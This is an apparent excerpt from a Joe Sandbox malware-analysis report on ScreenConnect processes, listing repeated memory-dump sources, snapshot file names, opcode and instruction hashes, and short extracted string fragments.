                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15E0E53E7042408BC3465BB8982412D3B739EC222130C8827D156CB3F1CE318C05CBB2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2192460293efb5eff2ff9e08411480f53d5049782dab9e1fc026addcbdd9a0eb
                                                                                                                                                                                                                                                    • Instruction ID: 6a8c217894b3ad21dfeed926bb7fb29d5deadd2882232e5286c261e02b9ed56c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2192460293efb5eff2ff9e08411480f53d5049782dab9e1fc026addcbdd9a0eb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96E02631700310578B142AAE78C852FBADAFFC9A21344843DF20EC3340CE718C0543E0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 683b2755ac9b874e9aca0673ba35ca85c3cb21b5784c3bdf382ccee417c74a67
                                                                                                                                                                                                                                                    • Instruction ID: 149e6c828f75cf0375c31626fa97ed1826a20d92510caa408eee455e6e6d774f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 683b2755ac9b874e9aca0673ba35ca85c3cb21b5784c3bdf382ccee417c74a67
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69F0E538A192909FC7066FB59A1C2587FE1EF46302B19449AD41687321CB319801CBE2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 40c1acf650d09d82135d828d589adb3055fd177b1747d44bc57a43675c123b2e
                                                                                                                                                                                                                                                    • Instruction ID: afb98b9ebe330825430bf07f4c0074995a4109ccc57cb6210cfc7faa6af8a18b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 40c1acf650d09d82135d828d589adb3055fd177b1747d44bc57a43675c123b2e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1CE0227894B2CA9FC742EFB4EC40759BFB8CB43202B0441DAD548CB252DA714F049BA2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: ff5ec04d9b012bdb72f427f262eec01276f0ca8d8caca39d397b80714e142968
                                                                                                                                                                                                                                                    • Instruction ID: 4d32f96d50a774721f0ab33e2cfc9223125b442d102a84c73c54c900c2440fec
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff5ec04d9b012bdb72f427f262eec01276f0ca8d8caca39d397b80714e142968
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7E0DF36740300878B042BFD64D822D76D3AFC8626358883EE10AD33A0CE728C164791
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3e9368b782a0545b165f2dbb5df833ad97751a948aedad1750aa93cbcb9fc002
                                                                                                                                                                                                                                                    • Instruction ID: 835cca07cf911d9272f3c2a7ea86640e66289ea010ab22a570221af0e4e9735e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e9368b782a0545b165f2dbb5df833ad97751a948aedad1750aa93cbcb9fc002
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 21E08632B01D519B8B10915CB854555B3C98F99365F3C8571F528CB388FA22DC8143B0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9685229fdb58bf0e8cd3f3079d8bddb3f808fdf2116ef1b08ede690f1df47013
                                                                                                                                                                                                                                                    • Instruction ID: 8fffeab30e04acefcca53033d70465d2962d6c5b771b88c28369e26df5b434ba
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9685229fdb58bf0e8cd3f3079d8bddb3f808fdf2116ef1b08ede690f1df47013
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9E09B74D001055B8B40DFFC9745459BBF0DA09214B288699945AD7791F732950347E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8ecd040df462a3843260686ff2d4e0c616c414a4f25315bc79ee3b975aff70d1
                                                                                                                                                                                                                                                    • Instruction ID: deaa3eb9b92e90a5f20136a5e110a3175626dae1b74f59003d02dcc01c1306c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ecd040df462a3843260686ff2d4e0c616c414a4f25315bc79ee3b975aff70d1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53F0E53080A285CFC711DFF8D94486A3FB1EF8730474842CBC4549B1A2C6289912FBE2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1d3dec3c958693898718a71c3db7c73b14b8e3186e3c250e7d54f566b0eafaeb
                                                                                                                                                                                                                                                    • Instruction ID: 5bbf6693ee1e34d6bd71d130181e47c28e5d2bd2b6f9a769de40f9b44aad9b1d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d3dec3c958693898718a71c3db7c73b14b8e3186e3c250e7d54f566b0eafaeb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50E02B7520C3800FC316D7BCF4016DC3FA1DEC221070809D9D0408F277C755A908C365
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: eda0cbcf112c8a5bc85debc5b0d2e75b049a500c2a0632afa500cb9a9a241613
                                                                                                                                                                                                                                                    • Instruction ID: d0eb34db926922bc1590bd9ac171cc7e5b19c18fce139af46faf769ae2a2cb1f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eda0cbcf112c8a5bc85debc5b0d2e75b049a500c2a0632afa500cb9a9a241613
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5EE0867A3101145742446B7DE80855E7BAADFCA2713108526E51AC73D0CF719C0297E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0d975b8e3691e53e584aa549cea1e238732ddd807b68bacd3c78197a2bb2be65
                                                                                                                                                                                                                                                    • Instruction ID: 6f8e4ce4c525e010345fe150e5c60546401322fb1af6d4cb1cbb3bdde3fe4750
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d975b8e3691e53e584aa549cea1e238732ddd807b68bacd3c78197a2bb2be65
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92E06DB081D3828FC341DF789958145BFE0AF06201F05899EC884C7151E2359996CB52
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: c8c45d86c1e6319c52991df287d0db8a4b21a0a2838fcf926958c6c9b3944bb5
                                                                                                                                                                                                                                                    • Instruction ID: 2b3e7ca7b45c9a24696c8e37cebcc9ecbae6272d042172940ecf112f8a4de4c0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8c45d86c1e6319c52991df287d0db8a4b21a0a2838fcf926958c6c9b3944bb5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4E0C216B4E2D00FD70303386CA02F97F64CF83214B1800D3C0C5CB093D664461AD766
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 66f88271505855a98a94fb1b01495b1b82f8e585b32dfcde9b8058b57b025634
                                                                                                                                                                                                                                                    • Instruction ID: bfeaded8346c3e1f4b65a51467abd3e1ada57719bd24c71b2d349fdb6f38d9fe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66f88271505855a98a94fb1b01495b1b82f8e585b32dfcde9b8058b57b025634
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EE04F3004D3915FC3129B24988A6D57FE4AB16228F0849D9D5858E583D266A45BCFA2
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: cfe5b4a2da36f9e826cda6dd50b47562d4c2b93e357c06c6953a7d8634fcb46a
                                                                                                                                                                                                                                                    • Instruction ID: 5f95a96d181eaa3723583d3b24971d0166bce2ac12f21d954e3871dbe719118a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cfe5b4a2da36f9e826cda6dd50b47562d4c2b93e357c06c6953a7d8634fcb46a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3DD01730A15208EF8B40EFB8E90195EBBF9EB45300B1041A8D408D3210EA316F01AB81
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2445250148.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 162e323455fa9d13085976c32a99359b1e87081e9b907048e2fe8cf7a4deb36e
                                                                                                                                                                                                                                                    • Instruction ID: 1d77164cb4d721e3512a605be876429616401163107a616d34f6736cc35f822b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 162e323455fa9d13085976c32a99359b1e87081e9b907048e2fe8cf7a4deb36e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03D05B75D0110CEFCB40DFB8ED41B5DB7B9DB45201B1085A9D408D7244DA715F049B81
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $]q$$]q
                                                                                                                                                                                                                                                    • API String ID: 0-127220927
                                                                                                                                                                                                                                                    • Opcode ID: 315509945ab1dc06a1734f94836b182d99db439724cea70fc5647c20e36d8bdf
                                                                                                                                                                                                                                                    • Instruction ID: a3df232d6c3fef8d20ed8248da54f34d4c0c57808a73f3bb7ec2351e00d46561
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 315509945ab1dc06a1734f94836b182d99db439724cea70fc5647c20e36d8bdf
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38B1A330A00319CFDB19EFA9C454AAEBFB1FF55704F1086ADD509AB265DB74D886CB80
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (&]q$(aq
                                                                                                                                                                                                                                                    • API String ID: 0-1602648543
                                                                                                                                                                                                                                                    • Opcode ID: f3be296efb861364361fa999d6b836dfe001160e4033a8888ff040bd60aac036
                                                                                                                                                                                                                                                    • Instruction ID: 792f1f9eb2a023207832a0cdf1cf4c7e3edc9e4dbf6f2dbf425c999d2b8c9774
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3be296efb861364361fa999d6b836dfe001160e4033a8888ff040bd60aac036
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52617231F002198BEB18DFB9C4506AEBAA6EFD9700F1485ADD406B7384DF34AD46C791
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: `Q]q$`Q]q
                                                                                                                                                                                                                                                    • API String ID: 0-3952371890
                                                                                                                                                                                                                                                    • Opcode ID: 6ca18f0cdbcede1f9dbea9305f967bec620bb65568fe7f948ce6499862967c3e
                                                                                                                                                                                                                                                    • Instruction ID: 690483c7faa8dd80682e920c30816220ec2dac2ab4f24053c342cb4280ff1ca3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ca18f0cdbcede1f9dbea9305f967bec620bb65568fe7f948ce6499862967c3e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B841AE71A003199FDB68AF68C814BAEBFB5FB49700F0085E9D549A7290DB745E48CF92
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $]q$$]q
                                                                                                                                                                                                                                                    • API String ID: 0-127220927
                                                                                                                                                                                                                                                    • Opcode ID: 675c2325fe958ecaaa79563337925dee7231318e4c2aeb7c2e72ea9f4aa8a88b
                                                                                                                                                                                                                                                    • Instruction ID: ce98491961edd4242f48e0e7cee3280e4bdda14545528ce805ac16812f667f8a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 675c2325fe958ecaaa79563337925dee7231318e4c2aeb7c2e72ea9f4aa8a88b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ABD05E307802088F973CCE2DD98091173E8FF44E023A104E9DA458B23ACB20FC41C755
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                                                                    • API String ID: 0-2564639436
                                                                                                                                                                                                                                                    • Opcode ID: f561c61c4aecabe9c70de33462d83505726ce6b296ecbd6a57a317b6c013e7de
                                                                                                                                                                                                                                                    • Instruction ID: 76f83f3c8e8cb7c2b8970307483ffafcfe7dffc33ad5ef1dd877db7696ad5029
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f561c61c4aecabe9c70de33462d83505726ce6b296ecbd6a57a317b6c013e7de
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79D17374A40715CFCB08DF68D884A99B7B6FF49710B1186A9E919AB365DB30FC85CF80
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (aq
                                                                                                                                                                                                                                                    • API String ID: 0-600464949
                                                                                                                                                                                                                                                    • Opcode ID: aa797ab6a931d68e890d13a6239695bd4f1d597aefb1d05e36b5d7b206200f17
                                                                                                                                                                                                                                                    • Instruction ID: 0da3159117cb81bcebac55ec424162c30dd6a41f7114095c5798a01b33035445
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aa797ab6a931d68e890d13a6239695bd4f1d597aefb1d05e36b5d7b206200f17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C611834B102159FDB18DF68D99496EB7B6FF8D715B1090A8E506AB365DB30EC02DF40
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: LR]q
                                                                                                                                                                                                                                                    • API String ID: 0-3081347316
                                                                                                                                                                                                                                                    • Opcode ID: be793ff7c78155e66e9cf459a48484f74916b7dce1045d982b7c9017c1d86bef
                                                                                                                                                                                                                                                    • Instruction ID: 12e103d78737e5db608518c800da1ca0389fbc04f36b347c6c7245c63793b75b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be793ff7c78155e66e9cf459a48484f74916b7dce1045d982b7c9017c1d86bef
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E51D430B002169FDB299B78D85476EBBE2FF84B11F1489ADE846DB291EB349C85C741
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $]q
                                                                                                                                                                                                                                                    • API String ID: 0-1007455737
                                                                                                                                                                                                                                                    • Opcode ID: f06f809a23e595e801ef04a55bc5119596f8be791c3091ad73c6353b0f011a2b
                                                                                                                                                                                                                                                    • Instruction ID: 0cbdbc56cf0ab8ac5f72c6ecc363af4678359723c3d865f9a3924bddd8dbe8b1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f06f809a23e595e801ef04a55bc5119596f8be791c3091ad73c6353b0f011a2b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92517130A0071ACFDB19DFB8C458A6DBBB1FF54704F1085ADD419AB265EB74D885CB80
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: nCuq
                                                                                                                                                                                                                                                    • API String ID: 0-4247494828
                                                                                                                                                                                                                                                    • Opcode ID: 2d49dc8a8b0990eccfacacf4b9eef2257efab7bac2c1e5dbeb09f150f4b6f8bb
                                                                                                                                                                                                                                                    • Instruction ID: acc01ff868e218fcc2dbb0782ad557bb331195fea1b1dbd891439ef1613bc64f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d49dc8a8b0990eccfacacf4b9eef2257efab7bac2c1e5dbeb09f150f4b6f8bb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B518230B402068FDB2DEB39D954A6E77E6EF88A14B1044B8E506DB365EF74EC05CB91
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: nCuq
                                                                                                                                                                                                                                                    • API String ID: 0-4247494828
                                                                                                                                                                                                                                                    • Opcode ID: 7d0c4d942ac2b3796dacae273d771b7d928ff4ebf3c48ef2ceab2ec9c9f15376
                                                                                                                                                                                                                                                    • Instruction ID: 74653fdacfd3fef63d6d8e3d4d77824042828648a3f3465912c1b56e01c95576
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d0c4d942ac2b3796dacae273d771b7d928ff4ebf3c48ef2ceab2ec9c9f15376
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 12515F70B402068FDB29EB39D554A6E77E6EF88A00B1444BCE506DB365EF74EC06CB91
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (aq
                                                                                                                                                                                                                                                    • API String ID: 0-600464949
                                                                                                                                                                                                                                                    • Opcode ID: 906dcc91ff85ef1581b75ef4370ee37bf317699dbc51cb3619affe9ae6cb2afd
                                                                                                                                                                                                                                                    • Instruction ID: 52e2e9c629190360d5068597ece2fef947ad29167a2bbc8f1ba41d7153858b13
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 906dcc91ff85ef1581b75ef4370ee37bf317699dbc51cb3619affe9ae6cb2afd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941B131A0010ACBCB19EF69D494AADBBB6FF84710F14C569D9059B35ADF35E80ACF90
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                    • API String ID: 0-1334834377
